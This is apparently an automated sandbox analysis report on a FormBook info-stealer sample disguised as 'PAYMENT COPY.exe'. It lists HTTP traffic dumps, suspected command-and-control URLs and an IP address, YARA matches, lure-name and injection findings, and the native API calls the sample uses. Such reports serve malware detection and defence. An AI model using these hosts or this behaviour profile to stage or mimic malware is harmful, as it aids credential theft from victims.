                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 08:13:33 GMTContent-Type: text/htmlContent-Length: 7979Connection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: "1f2b-59f878ddd2a87"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2a 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 7d 0d 0a 69 6d 67 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 7d 0d 0a 75 6c 20 7b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0d 0a 7d 0d 0a 68 74 6d 6c 20 7b 0d 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0d 0a 7d 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 31 34 33 2c 20 38 33 29 3b 0d 0a 7d 0d 0a 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 34 70 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 7d 0d 0a 68 32 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 7d 0d 0a 70 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 7d 0d 0a 2e 65 78 70 6c 61 69 6e 20 7b 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 08:13:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 08:13:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 08:13:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 08:13:47 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                      Source: PAYMENT COPY.exe, 00000000.00000002.1027702847.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1278877272.0000000002681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.251.83.222
                      Source: PAYMENT COPY.exe, 00000000.00000002.1027702847.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1278877272.0000000002681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.251.83.222/win32/panel/uploads/Rymwg.wav
                      Source: PAYMENT COPY.exe, HashSize.exe.0.drString found in binary or memory: http://196.251.83.222/win32/panel/uploads/Rymwg.wavYWxCF4U7xiIliA
                      Source: BMYdhGJqo1.exe, 00000008.00000002.3353285344.000000000419C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ibm-p8-kvm-03-guest-02.virt.pnr.lab.eng.rdu2.redhat.com/
                      Source: PAYMENT COPY.exe, 00000000.00000002.1027702847.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1278877272.0000000002681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: BMYdhGJqo1.exe, 00000008.00000002.3351843666.0000000002674000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jingdongpt.shop
                      Source: BMYdhGJqo1.exe, 00000008.00000002.3351843666.0000000002674000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jingdongpt.shop/j64s/
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                      Source: finger.exe, 00000004.00000002.3353879564.00000000053EE000.00000004.10000000.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3353285344.000000000432E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ad.netowl.jp/js/star-errorpage.js?date=
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: finger.exe, 00000004.00000002.3353879564.0000000004116000.00000004.10000000.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3353285344.0000000003056000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://error.skycloud.tw/system/error?code=400
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                      Source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: finger.exe, 00000004.00000002.3348989479.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480
                      Source: finger.exe, 00000004.00000002.3348989479.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: finger.exe, 00000004.00000002.3348989479.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: finger.exe, 00000004.00000003.1344984477.0000000007CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: finger.exe, 00000004.00000002.3348989479.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: finger.exe, 00000004.00000002.3348989479.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: finger.exe, 00000004.00000002.3348989479.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: finger.exe, 00000004.00000002.3348989479.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, PAYMENT COPY.exe, 00000000.00000002.1027702847.00000000029CF000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1278877272.00000000026AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20Y&
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: finger.exe, 00000004.00000002.3353879564.00000000053EE000.00000004.10000000.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3353285344.000000000432E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.star.ne.jp/

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3348154175.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3352771061.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3351872954.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1159249310.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3351350564.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1158626557.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3351843666.0000000002610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1162118891.0000000001CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: PAYMENT COPY.exe
                      Sample has a suspicious name (potential lure to open the executable)
                      Source: PAYMENT COPY.exeStatic file information: Suspicious name
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0042CE23 NtClose,1_2_0042CE23
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012B60 NtClose,LdrInitializeThunk,1_2_01012B60
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_01012DF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_01012C70
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010135C0 NtCreateMutant,LdrInitializeThunk,1_2_010135C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01014340 NtSetContextThread,1_2_01014340
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01014650 NtSuspendThread,1_2_01014650
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012B80 NtQueryInformationFile,1_2_01012B80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012BA0 NtEnumerateValueKey,1_2_01012BA0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012BE0 NtQueryValueKey,1_2_01012BE0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012BF0 NtAllocateVirtualMemory,1_2_01012BF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012AB0 NtWaitForSingleObject,1_2_01012AB0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012AD0 NtReadFile,1_2_01012AD0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012AF0 NtWriteFile,1_2_01012AF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012D00 NtSetInformationFile,1_2_01012D00
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012D10 NtMapViewOfSection,1_2_01012D10
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012D30 NtUnmapViewOfSection,1_2_01012D30
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012DB0 NtEnumerateKey,1_2_01012DB0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012DD0 NtDelayExecution,1_2_01012DD0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012C00 NtQueryInformationProcess,1_2_01012C00
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012C60 NtCreateKey,1_2_01012C60
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012CA0 NtQueryInformationToken,1_2_01012CA0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012CC0 NtQueryVirtualMemory,1_2_01012CC0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012CF0 NtOpenProcess,1_2_01012CF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012F30 NtCreateSection,1_2_01012F30
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012F60 NtCreateProcessEx,1_2_01012F60
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012F90 NtProtectVirtualMemory,1_2_01012F90
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012FA0 NtQuerySection,1_2_01012FA0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012FB0 NtResumeThread,1_2_01012FB0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012FE0 NtCreateFile,1_2_01012FE0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012E30 NtWriteVirtualMemory,1_2_01012E30
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012E80 NtReadVirtualMemory,1_2_01012E80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012EA0 NtAdjustPrivilegesToken,1_2_01012EA0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012EE0 NtQueueApcThread,1_2_01012EE0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01013010 NtOpenDirectoryObject,1_2_01013010
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01013090 NtSetValueKey,1_2_01013090
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010139B0 NtGetContextThread,1_2_010139B0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01013D10 NtOpenProcessToken,1_2_01013D10
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01013D70 NtOpenThread,1_2_01013D70
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E4340 NtSetContextThread,LdrInitializeThunk,4_2_035E4340
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E4650 NtSuspendThread,LdrInitializeThunk,4_2_035E4650
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2B60 NtClose,LdrInitializeThunk,4_2_035E2B60
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_035E2BF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_035E2BE0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_035E2BA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2AD0 NtReadFile,LdrInitializeThunk,4_2_035E2AD0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2AF0 NtWriteFile,LdrInitializeThunk,4_2_035E2AF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2F30 NtCreateSection,LdrInitializeThunk,4_2_035E2F30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2FE0 NtCreateFile,LdrInitializeThunk,4_2_035E2FE0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2FB0 NtResumeThread,LdrInitializeThunk,4_2_035E2FB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_035E2EE0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_035E2E80
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_035E2D10
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_035E2D30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2DD0 NtDelayExecution,LdrInitializeThunk,4_2_035E2DD0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_035E2DF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_035E2C70
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2C60 NtCreateKey,LdrInitializeThunk,4_2_035E2C60
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_035E2CA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E35C0 NtCreateMutant,LdrInitializeThunk,4_2_035E35C0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E39B0 NtGetContextThread,LdrInitializeThunk,4_2_035E39B0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2B80 NtQueryInformationFile,4_2_035E2B80
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2AB0 NtWaitForSingleObject,4_2_035E2AB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2F60 NtCreateProcessEx,4_2_035E2F60
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2F90 NtProtectVirtualMemory,4_2_035E2F90
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2FA0 NtQuerySection,4_2_035E2FA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2E30 NtWriteVirtualMemory,4_2_035E2E30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2EA0 NtAdjustPrivilegesToken,4_2_035E2EA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2D00 NtSetInformationFile,4_2_035E2D00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2DB0 NtEnumerateKey,4_2_035E2DB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2C00 NtQueryInformationProcess,4_2_035E2C00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2CC0 NtQueryVirtualMemory,4_2_035E2CC0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E2CF0 NtOpenProcess,4_2_035E2CF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E3010 NtOpenDirectoryObject,4_2_035E3010
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E3090 NtSetValueKey,4_2_035E3090
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E3D70 NtOpenThread,4_2_035E3D70
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E3D10 NtOpenProcessToken,4_2_035E3D10
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BC9790 NtCreateFile,4_2_02BC9790
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BC9AB0 NtClose,4_2_02BC9AB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BC9A00 NtDeleteFile,4_2_02BC9A00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BC9900 NtReadFile,4_2_02BC9900
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BC9C10 NtAllocateVirtualMemory,4_2_02BC9C10
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_0277B6100_2_0277B610
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_0277BBA00_2_0277BBA0
